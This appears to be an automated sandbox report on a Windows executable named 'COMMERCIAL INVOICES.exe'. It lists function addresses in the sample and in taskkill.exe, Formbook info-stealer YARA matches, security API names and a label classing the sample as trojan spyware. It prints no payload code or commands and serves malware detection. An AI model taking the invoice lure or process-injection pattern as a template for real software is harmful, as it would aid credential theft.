            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012669624_2_01266962
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012529A04_2_012529A0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0131A9A64_2_0131A9A6
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012528404_2_01252840
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0125A8404_2_0125A840
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012368B84_2_012368B8
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0127E8F04_2_0127E8F0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0130AB404_2_0130AB40
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01306BD74_2_01306BD7
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0124EA804_2_0124EA80
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0125AD004_2_0125AD00
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012ECD1F4_2_012ECD1F
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01268DBF4_2_01268DBF
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0124ADE04_2_0124ADE0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01250C004_2_01250C00
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012F0CB54_2_012F0CB5
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01240CF24_2_01240CF2
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01292F284_2_01292F28
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01270F304_2_01270F30
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012F2F304_2_012F2F30
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012C4F404_2_012C4F40
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012CEFA04_2_012CEFA0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0125CFE04_2_0125CFE0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01242FC84_2_01242FC8
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0130EE264_2_0130EE26
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01250E594_2_01250E59
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0130CE934_2_0130CE93
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01262E904_2_01262E90
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0130EEDB4_2_0130EEDB
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0128516C4_2_0128516C
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0123F1724_2_0123F172
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0131B16B4_2_0131B16B
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0125B1B04_2_0125B1B0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0130F0E04_2_0130F0E0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_013070E94_2_013070E9
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012FF0CC4_2_012FF0CC
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012570C04_2_012570C0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0130132D4_2_0130132D
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0123D34C4_2_0123D34C
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0129739A4_2_0129739A
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012552A04_2_012552A0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012F12ED4_2_012F12ED
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0126B2C04_2_0126B2C0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_013075714_2_01307571
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012ED5B04_2_012ED5B0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_013195C34_2_013195C3
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0130F43F4_2_0130F43F
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012414604_2_01241460
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0130F7B04_2_0130F7B0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012956304_2_01295630
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_013016CC4_2_013016CC
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012E59104_2_012E5910
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012599504_2_01259950
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0126B9504_2_0126B950
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012BD8004_2_012BD800
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012538E04_2_012538E0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0130FB764_2_0130FB76
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0126FB804_2_0126FB80
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0128DBF94_2_0128DBF9
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012C5BF04_2_012C5BF0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012C3A6C4_2_012C3A6C
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01307A464_2_01307A46
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0130FA494_2_0130FA49
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012EDAAC4_2_012EDAAC
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01295AA04_2_01295AA0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012F1AA34_2_012F1AA3
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012FDAC64_2_012FDAC6
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01307D734_2_01307D73
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01253D404_2_01253D40
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01301D5A4_2_01301D5A
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0126FDC04_2_0126FDC0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012C9C324_2_012C9C32
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0130FCF24_2_0130FCF2
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0130FF094_2_0130FF09
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0130FFB14_2_0130FFB1
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01251F924_2_01251F92
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01259EB04_2_01259EB0
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04C5E4F66_2_04C5E4F6
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04C624466_2_04C62446
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04C544206_2_04C54420
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04C705916_2_04C70591
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04BB05356_2_04BB0535
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04BCC6E06_2_04BCC6E0
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04BAC7C06_2_04BAC7C0
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04BB07706_2_04BB0770
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04BD47506_2_04BD4750
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04C420006_2_04C42000
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04C681CC6_2_04C681CC
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04C641A26_2_04C641A2
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04C701AA6_2_04C701AA
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04C381586_2_04C38158
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04BA01006_2_04BA0100
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04C4A1186_2_04C4A118
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04C302C06_2_04C302C0
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04C502746_2_04C50274
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04C703E66_2_04C703E6
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04BBE3F06_2_04BBE3F0
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04C6A3526_2_04C6A352
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04BA0CF26_2_04BA0CF2
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04C50CB56_2_04C50CB5
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04BB0C006_2_04BB0C00
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04BC8DBF6_2_04BC8DBF
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04BAADE06_2_04BAADE0
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04BBAD006_2_04BBAD00
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04C4CD1F6_2_04C4CD1F
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04C6EEDB6_2_04C6EEDB
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04BC2E906_2_04BC2E90
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04C6CE936_2_04C6CE93
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04C6EE266_2_04C6EE26
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04BB0E596_2_04BB0E59
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04BBCFE06_2_04BBCFE0
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04C2EFA06_2_04C2EFA0
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04BA2FC86_2_04BA2FC8
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04C24F406_2_04C24F40
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04BD0F306_2_04BD0F30
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04BF2F286_2_04BF2F28
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04C52F306_2_04C52F30
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04B968B86_2_04B968B8
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04BDE8F06_2_04BDE8F0
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04BB28406_2_04BB2840
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04BBA8406_2_04BBA840
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04BB29A06_2_04BB29A0
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04C7A9A66_2_04C7A9A6
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04BC69626_2_04BC6962
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04BAEA806_2_04BAEA80
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04C66BD76_2_04C66BD7
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04C6AB406_2_04C6AB40
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04BA14606_2_04BA1460
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04C6F43F6_2_04C6F43F
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04C4D5B06_2_04C4D5B0
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04C675716_2_04C67571
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04C616CC6_2_04C616CC
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04C6F7B06_2_04C6F7B0
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04C5F0CC6_2_04C5F0CC
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04C6F0E06_2_04C6F0E0
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04C670E96_2_04C670E9
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04BB70C06_2_04BB70C0
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04BBB1B06_2_04BBB1B0
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04C7B16B6_2_04C7B16B
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04B9F1726_2_04B9F172
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04BE516C6_2_04BE516C
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04BB52A06_2_04BB52A0
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04C512ED6_2_04C512ED
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04BCB2C06_2_04BCB2C0
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04BF739A6_2_04BF739A
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04C6132D6_2_04C6132D
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04B9D34C6_2_04B9D34C
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04C6FCF26_2_04C6FCF2
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04C29C326_2_04C29C32
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04BCFDC06_2_04BCFDC0
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04C61D5A6_2_04C61D5A
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04C67D736_2_04C67D73
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04BB3D406_2_04BB3D40
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04BB9EB06_2_04BB9EB0
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04BB1F926_2_04BB1F92
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04B73FD56_2_04B73FD5
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04B73FD26_2_04B73FD2
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04C6FFB16_2_04C6FFB1
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04C6FF096_2_04C6FF09
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04BB38E06_2_04BB38E0
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04C1D8006_2_04C1D800
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04C459106_2_04C45910
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04BB99506_2_04BB9950
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04BCB9506_2_04BCB950
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04C5DAC66_2_04C5DAC6
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04BF5AA06_2_04BF5AA0
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04C51AA36_2_04C51AA3
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04C4DAAC6_2_04C4DAAC
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04C67A466_2_04C67A46
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04C6FA496_2_04C6FA49
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04C23A6C6_2_04C23A6C
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04C25BF06_2_04C25BF0
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04BCFB806_2_04BCFB80
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04BEDBF96_2_04BEDBF9
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04C6FB766_2_04C6FB76
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_00861B006_2_00861B00
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_008703E06_2_008703E0
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_0085CA206_2_0085CA20
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_0085ACC06_2_0085ACC0
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_0085CC406_2_0085CC40
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_008651C06_2_008651C0
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_0086339C6_2_0086339C
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_008633A06_2_008633A0
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_0087B8606_2_0087B860
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04A4E4456_2_04A4E445
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04A4E7DD6_2_04A4E7DD
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04A4E3246_2_04A4E324
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04A4D8486_2_04A4D848
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04A4CB086_2_04A4CB08
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: String function: 04C1EA12 appears 86 times
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: String function: 04BE5130 appears 58 times
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: String function: 04C2F290 appears 105 times
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: String function: 04BF7E54 appears 102 times
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: String function: 04B9B970 appears 280 times
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: String function: 012BEA12 appears 86 times
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: String function: 01285130 appears 58 times
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: String function: 012CF290 appears 105 times
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: String function: 01297E54 appears 111 times
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: String function: 0123B970 appears 280 times
            Source: COMMERCIAL INVOICES.exeStatic PE information: invalid certificate
            Source: COMMERCIAL INVOICES.exe, 00000000.00000000.2036488621.000000000079E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameJyn.exe6 vs COMMERCIAL INVOICES.exe
            Source: COMMERCIAL INVOICES.exe, 00000000.00000002.2382464563.0000000008C70000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs COMMERCIAL INVOICES.exe
            Source: COMMERCIAL INVOICES.exe, 00000000.00000002.2377057061.0000000000CBE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs COMMERCIAL INVOICES.exe
            Source: COMMERCIAL INVOICES.exe, 00000004.00000002.2544254617.000000000133D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs COMMERCIAL INVOICES.exe
            Source: COMMERCIAL INVOICES.exe, 00000004.00000002.2544022936.0000000000DA7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenametaskkill.exej% vs COMMERCIAL INVOICES.exe
            Source: COMMERCIAL INVOICES.exeBinary or memory string: OriginalFilenameJyn.exe6 vs COMMERCIAL INVOICES.exe
            Source: COMMERCIAL INVOICES.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 4.2.COMMERCIAL INVOICES.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 4.2.COMMERCIAL INVOICES.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.3899277856.00000000048F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.2604198656.0000000005EF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.3898777340.0000000000CD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.2543824282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.3899336059.0000000004940000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.3897564995.0000000000850000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.2545033489.0000000003F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.3899241480.00000000056D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: COMMERCIAL INVOICES.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.2.COMMERCIAL INVOICES.exe.8c70000.5.raw.unpack, SV9D1XeqHF0diChIWw.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.COMMERCIAL INVOICES.exe.8c70000.5.raw.unpack, SV9D1XeqHF0diChIWw.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.COMMERCIAL INVOICES.exe.8c70000.5.raw.unpack, SV9D1XeqHF0diChIWw.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.COMMERCIAL INVOICES.exe.3edf6c0.3.raw.unpack, SV9D1XeqHF0diChIWw.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.COMMERCIAL INVOICES.exe.3edf6c0.3.raw.unpack, SV9D1XeqHF0diChIWw.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.COMMERCIAL INVOICES.exe.3edf6c0.3.raw.unpack, SV9D1XeqHF0diChIWw.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.COMMERCIAL INVOICES.exe.3f674e0.2.raw.unpack, q598vXWMJVqmSJ4TcV.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.COMMERCIAL INVOICES.exe.8c70000.5.raw.unpack, q598vXWMJVqmSJ4TcV.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.COMMERCIAL INVOICES.exe.3f674e0.2.raw.unpack, SV9D1XeqHF0diChIWw.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.COMMERCIAL INVOICES.exe.3f674e0.2.raw.unpack, SV9D1XeqHF0diChIWw.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.COMMERCIAL INVOICES.exe.3f674e0.2.raw.unpack, SV9D1XeqHF0diChIWw.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.COMMERCIAL INVOICES.exe.3edf6c0.3.raw.unpack, q598vXWMJVqmSJ4TcV.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@10/9
